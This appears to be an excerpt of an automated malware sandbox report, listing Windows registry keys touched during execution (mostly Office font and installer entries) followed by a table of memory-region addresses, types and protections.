HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Windows\System32\display.dll,-4
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Program Files\Windows Sidebar\sidebar.exe,-11100
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Windows\system32\themecpl.dll,-10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr\Bssvpr14\RKPRY.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr\Bssvpr14\JVAJBEQ.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Handshake\{2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE}
data
There are 450 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
page read and write
32B6000
heap
page read and write
70000
trusted library allocation
page read and write
2440000
unkown
page read and write
2440000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
7E03000
heap
page read and write
729E000
unkown
page read and write
2DA2000
heap
page read and write
222000
direct allocation
page execute and read and write
270000
trusted library allocation
page read and write
4040000
unkown
page readonly
6C1000
heap
page read and write
1B90000
heap
page read and write
225E000
stack
page read and write
26E0000
unkown
page read and write
3A50000
unkown
page readonly
70000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
88E000
heap
page read and write
69F4000
heap
page read and write
32C3000
heap
page read and write
43E0000
heap
page read and write
1A0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
32C9000
trusted library allocation
page read and write
26E0000
unkown
page read and write
270000
trusted library allocation
page read and write
214000
heap
page read and write
1F0000
trusted library allocation
page read and write
32B8000
heap
page read and write
32B8000
heap
page read and write
26E0000
unkown
page read and write
907000
trusted library allocation
page read and write
26E0000
unkown
page read and write
210E000
stack
page read and write
400000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
3EAF000
stack
page read and write
920000
trusted library allocation
page read and write
10000
heap
page read and write
CD000
stack
page read and write
26E0000
unkown
page read and write
2BD0000
unkown
page read and write
2440000
unkown
page read and write
2BB0000
unkown
page read and write
2F6000
heap
page read and write
380000
trusted library allocation
page read and write
32AE000
heap
page read and write
2440000
unkown
page read and write
6A13000
heap
page read and write
1F1000
direct allocation
page execute and read and write
226000
heap
page read and write
5B2000
heap
page read and write
1F0000
trusted library allocation
page read and write
EB000
heap
page read and write
26E0000
unkown
page read and write
3299000
heap
page read and write
5E00000
heap
page read and write
2D91000
heap
page read and write
32B6000
heap
page read and write
72A0000
unkown
page read and write
489F000
stack
page read and write
487000
heap
page read and write
2290000
heap
page read and write
630000
heap
page read and write
3B00000
unkown
page read and write
1D30000
unkown
page readonly
32B1000
heap
page read and write
683B000
stack
page read and write
26F0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
1A0000
heap
page read and write
26E0000
unkown
page read and write
2BB0000
unkown
page read and write
35C0000
heap
page read and write
1F1000
direct allocation
page execute and read and write
26F0000
unkown
page read and write
222000
direct allocation
page execute and read and write
1A0000
trusted library allocation
page read and write
3EEC000
unkown
page read and write
45E000
stack
page read and write
222000
direct allocation
page execute and read and write
47F000
stack
page read and write
2BB0000
unkown
page read and write
2235000
heap
page read and write
401D000
stack
page read and write
1F1000
direct allocation
page execute and read and write
3BC0000
unkown
page read and write
3AB0000
unkown
page read and write
41FC000
stack
page read and write
1F1000
direct allocation
page execute and read and write
270000
trusted library allocation
page read and write
B92000
trusted library allocation
page read and write
3EFE000
unkown
page read and write
2440000
unkown
page read and write
577000
heap
page read and write
68B000
heap
page read and write
1D20000
unkown
page readonly
3AC0000
unkown
page read and write
3EEE000
unkown
page read and write
26F0000
unkown
page read and write
170000
trusted library allocation
page read and write
3483000
heap
page read and write
2BB0000
unkown
page read and write
20000
heap
page read and write
1F1000
direct allocation
page execute and read and write
26F0000
unkown
page read and write
64C000
heap
page read and write
2440000
unkown
page read and write
69000
system
page execute and read and write
3C0000
trusted library allocation
page read and write
4A8E000
stack
page read and write
7979000
unkown
page read and write
2440000
unkown
page read and write
4638000
unkown
page read and write
F0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
20B0000
heap
page read and write
2440000
unkown
page read and write
234E000
unkown
page read and write
460000
heap
page read and write
372F000
heap
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
32A1000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
32B8000
heap
page read and write
347D000
heap
page read and write
2BB0000
unkown
page read and write
3299000
heap
page read and write
3603000
trusted library allocation
page read and write
35A000
heap
page read and write
10000
heap
page read and write
34B6000
heap
page read and write
32B1000
heap
page read and write
5E22000
heap
page read and write
2BB0000
unkown
page read and write
7948000
unkown
page read and write
1A0000
trusted library allocation
page read and write
32B6000
heap
page read and write
4C8F000
stack
page read and write
2440000
unkown
page read and write
70000
trusted library allocation
page read and write
6A4000
heap
page read and write
1F0000
trusted library allocation
page read and write
540000
heap
page read and write
26F0000
unkown
page read and write
3AD0000
unkown
page read and write
32B6000
heap
page read and write
2380000
unkown
page read and write
720A000
heap
page read and write
550000
heap
page read and write
2E0B000
heap
page read and write
26F0000
unkown
page read and write
3B97000
stack
page read and write
26D2000
unkown
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
3549000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
2D6000
heap
page read and write
2440000
unkown
page read and write
68B000
heap
page read and write
E7000
system
page execute and read and write
26E0000
unkown
page read and write
62A1000
heap
page read and write
3470000
heap
page read and write
1B60000
heap
page read and write
2440000
unkown
page read and write
2177000
stack
page read and write
31E000
unkown
page read and write
3980000
unkown
page readonly
222000
direct allocation
page execute and read and write
2440000
unkown
page read and write
23DA000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
38B0000
unkown
page read and write
32B8000
heap
page read and write
222000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
27F0000
unkown
page read and write
53F000
stack
page read and write
F0000
trusted library allocation
page read and write
2B7000
heap
page read and write
1EC0000
heap
page read and write
1DEE000
stack
page read and write
797B000
unkown
page read and write
3512000
heap
page read and write
3299000
heap
page read and write
2407000
unkown
page read and write
4DBD000
heap
page read and write
3B90000
stack
page read and write
6B90000
heap
page read and write
16C000
heap
page read and write
1F1000
direct allocation
page execute and read and write
73C0000
heap
page read and write
1D5000
trusted library allocation
page execute and read and write
32C3000
heap
page read and write
2700000
unclassified section
page read and write
2F7000
heap
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
4260000
trusted library allocation
page read and write
32C3000
heap
page read and write
540000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
49CE000
stack
page read and write
356E000
heap
page read and write
1F1000
direct allocation
page execute and read and write
594000
heap
page read and write
70000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
3601000
trusted library allocation
page read and write
256000
heap
page read and write
230F000
stack
page read and write
7D4F000
stack
page read and write
2440000
unkown
page read and write
DD000
stack
page read and write
2D7D000
heap
page read and write
693000
heap
page read and write
401E000
stack
page read and write
6699000
stack
page read and write
2440000
unkown
page read and write
47EF000
stack
page read and write
2721000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
32B8000
heap
page read and write
2E07000
heap
page read and write
1F1000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
120000
unclassified section
page read and write
81C3000
unkown
page read and write
F0000
trusted library allocation
page read and write
208E000
stack
page read and write
2F0000
heap
page read and write
2BB0000
unkown
page read and write
20000
unkown
page readonly
222000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
38F000
stack
page read and write
2440000
unkown
page read and write
32B1000
heap
page read and write
3299000
heap
page read and write
440000
trusted library allocation
page read and write
179000
stack
page read and write
720A000
heap
page read and write
2B9E000
stack
page read and write
68E000
heap
page read and write
720000
unkown
page readonly
29CA000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
3D17000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
3AA1000
unkown
page read and write
494000
heap
page read and write
32B8000
heap
page read and write
26E0000
unkown
page read and write
32C3000
heap
page read and write
89B000
heap
page read and write
1F1000
direct allocation
page execute and read and write
